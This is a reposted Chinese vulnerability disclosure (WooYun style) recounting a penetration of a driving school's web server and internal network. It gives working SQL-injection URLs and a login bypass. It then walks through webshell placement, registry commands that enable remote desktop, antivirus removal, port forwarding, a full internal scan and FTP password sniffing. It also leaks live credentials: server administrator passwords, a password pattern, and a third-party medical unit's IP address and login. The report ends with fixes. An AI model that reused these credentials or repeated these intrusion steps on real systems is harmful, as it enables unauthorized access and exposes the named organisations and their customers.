神刀安全网

东方时尚一些安全问题导致内网渗透

简要描述:

多个安全问题,不容忽视。

详细说明:

一、服务器内网安全问题

http://www.dfss-club.com/class/class.jsp?id=16 sql注入

http://www.dfss-club.com/admin/index.jsp 后台登录地址 存在万能口令 admin' or 1=1–

成功登录后台后地址 http://www.dfss-club.com/admin/MyJspkja452asdfdfdsldfijkl.jsp

getshell:

登录后台后获取物理路径:

E:/Tomcat 5.0/webapps/club/index.jsp

结合sql注入写入菜刀一句话木马

http://www.dfss-club.com/img/main.jsp pass: test

E:/Tomcat 5.0/webapps/club/img/> whoami

nt authority/system

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 192.168.1.4

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.1.1

system权限,内网

机器安装有360 参考 WooYun: 轻松干掉360安全卫士主防(不止360哦) 直接秒掉 加用户 上传恶意二进制文件 改注册表毫无压力

2003开启远程桌面:

reg delete "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server" /v fDenyTSConnections /f

reg add "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

tasklist /svc netstat -ano 查询得知远程桌面端口33898

lcx端口转发:

下载lx.exe到c:/windows目录,进行端口转发

成功登录远程桌面

内网扫描

使用x-scan对内网进行扫描进行信息探测

主机 检测结果

192.168.1.154 发现安全漏洞

主机摘要 – OS: Windows 2003; PORT/TCP: 23, 80, 135, 139, 445, 1521, 8080

192.168.1.158 发现安全漏洞

主机摘要 – OS: Windows Version 6.0; PORT/TCP: 80, 135, 139, 445, 1433, 8080

192.168.1.153 发现安全漏洞

主机摘要 – OS: Windows Version 6.1; PORT/TCP: 135, 139, 445, 1433, 3389

192.168.1.155 发现安全漏洞

主机摘要 – OS: Windows NT 6.0; PORT/TCP: 80, 135, 139, 443, 445, 1025, 1027, 1433, 3389, 8000, 8080

192.168.1.90 发现安全漏洞

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 80, 443, 8000

192.168.1.4 发现安全漏洞

192.168.1.219 发现安全漏洞

主机摘要 – OS: Microsoft Windows 2003/.NET; OS details: Microsoft Windows 2003 Server; PORT/TCP: 135, 139, 445, 1025, 1521

192.168.1.159 发现安全漏洞

主机摘要 – OS: Windows Version 6.0; PORT/TCP: 80, 135, 139, 445, 1433, 8080

192.168.1.66 发现安全漏洞

主机摘要 – OS: Unknown OS; PORT/TCP: 21, 80, 135, 139, 445, 1521, 3306, 3389, 5800, 5900, 5901

192.168.1.32 发现安全警告

主机摘要 – OS: Microsoft Windows 2003/.NET; OS details: Microsoft Windows 2003 Server; PORT/TCP: 7, 9, 13, 19, 53, 80, 135, 139, 445, 1027

192.168.1.200 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 139, 443, 8080

192.168.1.107 发现安全警告

主机摘要 – OS: Microsoft Windows 2003/.NET; OS details: Microsoft Windows 2003 Server; PORT/TCP: 25, 80, 110, 135, 143, 465, 993, 995, 1025, 6000

192.168.1.62 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 5800, 5900, 5901

192.168.1.63 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 135, 139, 445, 5800, 5900, 5901

192.168.1.64 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 5800, 5900, 5901

192.168.1.65 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 135, 139, 445, 5800, 5900, 5901

192.168.1.61 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 135, 139, 445, 3389, 5800, 5900, 5901, 8000

192.168.1.99 发现安全警告

192.168.1.104 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 135, 139, 1025, 1521, 3389, 8080

192.168.1.231 发现安全警告

主机摘要 – OS: Linux 2.4.X|2.5.X|2.6.X; OS details: Linux 2.4.18 – 2.6.7; PORT/TCP: 22, 443

192.168.1.1 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 23, 80, 443

192.168.1.60 发现安全警告

主机摘要 – OS: Linux 2.4.X|2.5.X|2.6.X; OS details: Linux 2.4.18 – 2.6.7; PORT/TCP: 22, 111, 1521, 5900

192.168.1.254 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 23, 80, 443

192.168.1.78 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 80, 443, 8000

192.168.1.101 发现安全警告

主机摘要 – OS: Microsoft Windows 2003/.NET; OS details: Microsoft Windows 2003 Server; PORT/TCP: 80, 135, 139, 445

192.168.1.79 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 80, 443, 8000

192.168.1.85 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 53

192.168.1.251 发现安全警告

主机摘要 – OS: IBM AIX 4.X, Microsoft Windows 2003/.NET|NT/2K/XP; OS details: IBM AIX 4.3.2.0-4.3.3.0 on an IBM RS/*, Microsoft Windows Server 2003, Microsoft Windows XP SP2 (firewall enabled); PORT/TCP: 80, 139, 445

192.168.1.120 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 3389

192.168.1.71 发现安全警告

主机摘要 – OS: Unknown OS; PORT/TCP: 53, 135, 139, 445, 3389

192.168.1.98 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 139, 443, 445

192.168.1.96 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 139, 443

192.168.1.15 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 3389, 8000

192.168.1.82 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 8080

192.168.1.77 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 1433

192.168.1.74 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 135, 139, 445, 3389

192.168.1.83 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 135, 139, 445, 3389

192.168.1.86 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 135, 139, 443, 445, 3389

192.168.1.151 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 8080

192.168.1.18 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 139, 1433

192.168.1.97 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 445

192.168.1.84 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 445

192.168.1.202 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 80, 135, 139, 445, 3306, 3389, 8080

192.168.1.73 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 80, 111, 3306

192.168.1.30 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 111, 1521

192.168.1.75 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 111

192.168.1.31 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 111

192.168.1.33 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 111

192.168.1.102 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 80, 3306

192.168.1.103 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 80, 3306

192.168.1.72 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 22, 80

192.168.1.50 发现安全提示

主机摘要 – OS: Microsoft Windows 2003/.NET; OS details: Microsoft Windows 2003 Server; PORT/TCP: 445

192.168.1.171 发现安全提示

主机摘要 – OS: Linux 2.4.X|2.5.X|2.6.X; OS details: Linux 2.4.18 – 2.6.7, Linux 2.4.20 (Itanium), Linux 2.4.3 SMP (RedHat), Linux 2.4.7 through 2.6.3, Linux 2.6.0 (x86), Linux 2.6.0-test5 – 2.6.0 (x86), Linux 2.6.3 – 2.6.7, Linux kernel 2.6.4 (x86); PORT/TCP: 80, 3306, 8000

192.168.1.114 发现安全提示

192.168.1.105 发现安全提示

192.168.1.19 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 21, 80

192.168.1.22 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 22

192.168.1.23 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 22

192.168.1.29 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 1433

192.168.1.76 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 3389

192.168.1.198 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 21

192.168.1.13 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 80

192.168.1.140 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 21

192.168.1.130 发现安全提示

主机摘要 – OS: Unknown OS; PORT/TCP: 3306

本机嗅探

使用x-sniff对本地局域网同一交换下被动嗅探获取ftp密码

TCP [12/24/14 18:01:03]

192.168.1.4->192.168.1.198 Port: 2261->21

USER root

TCP [12/24/14 18:01:03]

192.168.1.4->192.168.1.198 Port: 2261->21

PASS dfss0425

登录ftp,获取大量敏感信息,包括网络拓扑图,机器密码,网络设备(路由交换密码,ip分配等) 经测试,密码均可登录

比如 //192.168.1.154/c$ (约车服务器)用户名administrator 密码Dfss_!@#$%^

通过分析,密码很有规律,总结得出常用密码:Dfss_!@#$%^ Dfss_!@#$%^&* Dfss_(WEBAPPNAME)!@#$%^&* dfss0425 等

虽然有些机器没开3389,但是开了smb共享,利用pstools套件里的psexec 在知道用户名密码情况下同样可以对其进行渗透。

二: 咖啡厅

机器没有安装还原软件或者还原卡,以及“网维” 软件,没有进行安全加固,可轻松读取机器密码,所有上网机密码一样americano ,在机器中可以提取他人上网记录和个人隐私文件。 比如,我在上网机上捡到一些东西中 其中有一个服务器的3389

一个医疗体检单位的内网3389:

124.207.153.74 ikangcw ikangcw 本来可以单独提交wooyun 服务器弱口令或者再来个内网渗透的,想想算了,一块提交了吧。

三: 约车大厅约车机器缺陷

机器刚开机初始化后,没有隐藏任务栏,可以直接对机器进行计算机常用操作,可以获取到约车客户端网段,程序打印空的约车记录单时,会报错,爆出路径同时也可以获取到约车服务端ip地址(192.168.1.154:8080)

四:另外东方时尚租车网也存在注入漏洞

http://www.dfsszc.com/NewsList.aspx?m=20131120105122323641%27%20and%20%27a%27=%27a

http://www.dfsszc.com/NewsList.aspx?m=20131120105122323641%27%20and%20%27a%27=%27b

漏洞证明:

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

东方时尚一些安全问题导致内网渗透

修复方案:

一、咖啡厅上网机安装还原卡或还原软件(比如雨过天晴) 以及类似网吧的万象软件

二、预约大厅预约机需要微调下,隐藏任务栏。

三、修复sql注入漏洞,清除webshell,修改内网中服务器常用密码以及路由设备的常用密码

本人刚从dfss毕业,感谢学校教授了我驾驶技能 和 颁发给我驾照,顺便问下,外地人不够5年社保,怎么搞一个京牌啊?

版权声明:神刀安全网转自 我了个去@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 东方时尚一些安全问题导致内网渗透

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮